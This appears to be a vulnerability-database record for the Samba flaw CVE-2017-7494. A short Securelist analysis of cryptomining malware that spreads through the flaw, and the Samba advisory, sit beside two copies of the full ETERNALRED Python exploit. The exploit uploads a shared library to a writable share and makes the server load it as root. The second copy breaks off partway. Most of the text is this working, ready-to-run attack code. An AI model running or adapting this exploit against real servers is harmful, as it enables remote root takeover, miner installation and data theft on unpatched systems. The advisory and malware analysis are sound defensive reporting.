They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim's computer.\n\n[](<https://securelist.com/files/2017/06/sambacry_03.png>)\n\n_Listing of INAebsGB.so_\n\nIt's worth noting that a similar payload can be found in the implementation of the SambaCry exploit in Metasploit.\n\n## cblRWuoCc.so\n\nThe main functionality of this file is to download and execute one of the most popular open-source cryptocurrency mining utilities \u2013 cpuminer (minerd). It is done by the hardcoded shell-command, shown on the screenshot below.\n\n[](<https://securelist.com/files/2017/06/sambacry_04.png>)\n\n_The main functionality of cblRWuoCc.so_\n\nThe file **minerd64_s** (8d8bdb58c5e57c565542040ed1988af9 \u2014 RiskTool.Linux.BitCoinMiner.a) downloaded in such a way is stored in **/tmp/m** on the victim's system.\n\n## Cpuminer and what it actually mines\n\nThe interesting part is that the version of cpuminer used is \"upgraded\", so it can be launched without any parameters to mine currency directly to the hardcoded attackers' wallet. We obviously became interested in this wallet, so we decided to investigate a bit and uncover the balance of the attackers' account.\n\nAlong with the attackers' wallet number, the pool address (**xmr.crypto-pool.fr:3333**) can be found in the body of the miner. This pool is created for mining the open-source cryptocurrency \u2013 Monero. Using all this data we managed to check out the balance on the attackers' wallet and the full log of transactions. Let's have a look:\n\n[](<https://securelist.com/files/2017/06/sambacry_05.png>)\n\n_Balance of the attackers' account on 08.06.2017_\n\n[](<https://securelist.com/files/2017/06/sambacry_06.png>)\n\n_Log of transactions with all the attackers' cryptocurrency income_\n\nThe mining utility is downloaded from the domain registered on April 29th 2017. 
According to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th. During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.\n\nConsidering that the world discovered the EternalRed vulnerability only at the end of May, and the attackers had already adopted it, the rate of growth in the number of infected machines has significantly increased. After about a month of mining, the attackers gained 98 XMR, which means they earned about $5,500 according to the currency exchange rate at the time of writing.\n\n## Conclusion\n\nAs a result, the attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers. In addition, through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim's computer with other types of malware.\n\nAt the moment we don't have any information about the actual scale of the attack. 
However, this is a great reason for system administrators and ordinary Linux users to update their Samba software to the latest version immediately to prevent future problems.", "modified": "2017-06-09T22:07:16", "published": "2017-06-09T22:07:16", "href": "https://securelist.com/sambacry-is-coming/78674/", "id": "SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F", "title": "SambaCry is coming", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-09T17:27:50", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-05-25T00:00:00", "type": "zdt", "title": "Samba 3.5.0 - Remote code execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27836", "id": "1337DAY-ID-27836", "sourceData": "#! /usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <[email\u00a0protected]>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n \r\n \r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n \r\n \r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n \r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n \r\n \r\n def hook_listShares(self):\r\n self._listShares 
= self.listSharesEx\r\n \r\n def hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n \r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n \r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n \r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n \r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n \r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. 
See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n \r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n \r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n \r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = 
server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n \r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n \r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n \r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, 
expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n \r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n \r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n \r\n closeFid(tid, fid)\r\n callback(results)\r\n \r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = 
SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n \r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n \r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n \r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n \r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n \r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n \r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = 
path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n \r\n \r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n \r\n messages_history = [ ]\r\n \r\n \r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n \r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n \r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = 
remaining_len)\r\n \r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n \r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n \r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n \r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n \r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), 
SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n \r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n \r\n conn = SMBConnectionEx(user, password, \"\", \"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n \r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n \r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n \r\n return None\r\n \r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n \r\n return True\r\n \r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n \r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n \r\n print(\"[+] Attempting to load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n \r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n \r\n return\r\n \r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n \r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n \r\n if share is 
None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n \r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n \r\n conn.close()\r\n \r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n \r\n For local exploit provide the full path to your shared library to load\r\n \r\n Your shared library should look something like this\r\n \r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n \r\n if not os.path.isfile(args.payload):\r\n print(\"[!] 
Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n \r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n \r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n \r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n \r\n load_payload(user, password, args.server, port, fullpath)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/27836", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2020-12-24T13:20:56", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.", "edition": 6, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "SAMBA:CVE-2017-7494", "href": "https://www.samba.org/samba/security/CVE-2017-7494.html", "title": "Remote code execution from a writable share. ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-05-26T05:54:17", "description": "", "published": "2017-05-25T00:00:00", "type": "packetstorm", "title": "Samba 3.5.0 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "id": "PACKETSTORM:142657", "href": "https://packetstormsecurity.com/files/142657/Samba-3.5.0-Remote-Code-Execution.html", "sourceData": "`#! 
/usr/bin/env python \n# Title : ETERNALRED \n# Date: 05/24/2017 \n# Exploit Author: steelo <knownsteelo@gmail.com> \n# Vendor Homepage: https://www.samba.org \n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 \n# CVE-2017-7494 \n \n \nimport argparse \nimport os.path \nimport sys \nimport tempfile \nimport time \nfrom smb.SMBConnection import SMBConnection \nfrom smb import smb_structs \nfrom smb.base import _PendingRequest \nfrom smb.smb2_structs import * \nfrom smb.base import * \n \n \nclass SharedDevice2(SharedDevice): \ndef __init__(self, type, name, comments, path, password): \nsuper().__init__(type, name, comments) \nself.path = path \nself.password = password \n \nclass SMBConnectionEx(SMBConnection): \ndef __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False): \nsuper().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp) \n \n \ndef hook_listShares(self): \nself._listShares = self.listSharesEx \n \ndef hook_retrieveFile(self): \nself._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix \n \n# This is maily the original listShares but request a higher level of info \ndef listSharesEx(self, callback, errback, timeout = 30): \nif not self.has_authenticated: \nraise NotReadyError('SMB connection not authenticated') \n \nexpiry_time = time.time() + timeout \npath = 'IPC$' \nmessages_history = [ ] \n \ndef connectSrvSvc(tid): \nm = SMB2Message(SMB2CreateRequest('srvsvc', \nfile_attributes = 0, \naccess_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE, \nshare_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \noplock = SMB2_OPLOCK_LEVEL_NONE, \nimpersonation = SEC_IMPERSONATE, \ncreate_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL, \ncreate_disp = FILE_OPEN)) \n \nm.tid = tid \nself._sendSMBMessage(m) 
\nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback) \nmessages_history.append(m) \n \ndef connectSrvSvcCB(create_message, **kwargs): \nmessages_history.append(create_message) \nif create_message.status == 0: \ncall_id = self._getNextRPCCallID() \n# The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706] \n# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream \ndata_bytes = \\ \nbinascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<I', call_id) + \\ \nbinascii.unhexlify(b\"\"\" \nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00 \nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 \n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 \n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b \n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 \n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00 \n01 00 00 00 \n\"\"\".replace(b' ', b'').replace(b'\\n', b'')) \nm = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0)) \nm.tid = create_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid) \nmessages_history.append(m) \nelse: \nerrback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history)) \n \ndef rpcBindCB(trans_message, **kwargs): \nmessages_history.append(trans_message) \nif trans_message.status == 0: \nm = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0)) \nm.tid = trans_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid']) \nmessages_history.append(m) \nelse: \ncloseFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from 
Server Service RPC endpoint') \n \ndef rpcReadCB(read_message, **kwargs): \nmessages_history.append(read_message) \nif read_message.status == 0: \ncall_id = self._getNextRPCCallID() \n \npadding = b'' \nremote_name = '\\\\\\\\' + self.remote_name \nserver_len = len(remote_name) + 1 \nserver_bytes_len = server_len * 2 \nif server_len % 2 != 0: \npadding = b'\\0\\0' \nserver_bytes_len += 2 \n \n# The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. \n# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream \ndata_bytes = \\ \nbinascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\ \nbinascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<III', server_len, 0, server_len) + \\ \n(remote_name + '\\0').encode('UTF-16LE') + padding + \\ \nbinascii.unhexlify(b\"\"\" \n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00 \n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 \n\"\"\".replace(b' ', b'').replace(b'\\n', b'')) \nm = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes)) \nm.tid = read_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) \nmessages_history.append(m) \nelse: \ncloseFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint') \n \ndef listShareResultsCB(result_message, **kwargs): \nmessages_history.append(result_message) \nif result_message.status == 0: \n# The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. 
\ndata_bytes = result_message.payload.out_data \n \nif data_bytes[3] & 0x02 == 0: \nsendReadRequest(result_message.tid, kwargs['fid'], data_bytes) \nelse: \ndecodeResults(result_message.tid, kwargs['fid'], data_bytes) \nelif result_message.status == 0x0103: # STATUS_PENDING \nself.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) \nelse: \ncloseFid(result_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) \n \ndef decodeResults(tid, fid, data_bytes): \nshares_count = struct.unpack('<I', data_bytes[36:40])[0] \nresults = [ ] # A list of SharedDevice2 instances \noffset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants \nfor i in range(0, shares_count): \nresults.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None)) \noffset += 12 \n \nfor i in range(0, shares_count): \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].name = 